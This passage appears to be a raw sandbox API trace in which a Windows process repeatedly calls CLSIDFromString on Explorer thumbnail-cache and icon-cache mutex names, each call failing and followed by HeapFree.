CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1920.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.624] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.624] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1280.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.625] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.625] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_768.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.625] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.625] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.625] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.625] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.625] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.625] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.625] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.626] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_exif.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.626] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.626] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_custom_stream.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.626] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.626] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.626] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.626] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.626] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.626] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_2560.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.626] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.626] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.626] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.627] CLSIDFromString (in: lpsz="ZonesCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.627] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.627] CLSIDFromString (in: lpsz="ZonesLockedCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.628] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.628] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.628] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.628] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_2560.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.628] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.628] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.628] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.629] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.629] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.629] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_16.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.629] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.629] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.629] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.629] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_48.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.629] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.629] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.629] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.630] CLSIDFromString (in: lpsz="MSCTF.Asm.MutexDefault1S-1-5-21-1560258661-3990802383-1811730007-1000", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.631] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.631] CLSIDFromString (in: lpsz="_SHuassist.mtx", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.631] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.631] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_sr.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.631] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.631] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_2560.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.631] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.631] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_1280.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.632] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.632] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1280.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.632] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.632] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.644] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.644] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_wide.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.645] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.645] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_exif.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.645] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.645] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_wide_alternate.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.645] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.645] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.645] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.645] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_48.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.646] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.646] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.646] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.646] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_16.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.646] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.646] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_1920.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.646] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.646] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_2560.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.647] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.647] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.647] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.647] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!IconCacheInit", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.647] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.647] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.647] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.647] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1920.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.647] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.648] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_custom_stream.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.648] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.648] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1280.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.648] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.648] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_768.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.648] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.648] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_96.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.648] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.648] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_256.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.649] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.649] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.649] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.649] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.649] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.649] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_exif.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.649] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.649] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_16.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.649] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.650] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.650] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.650] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.650] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.650] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_custom_stream.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.650] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.650] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_32.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 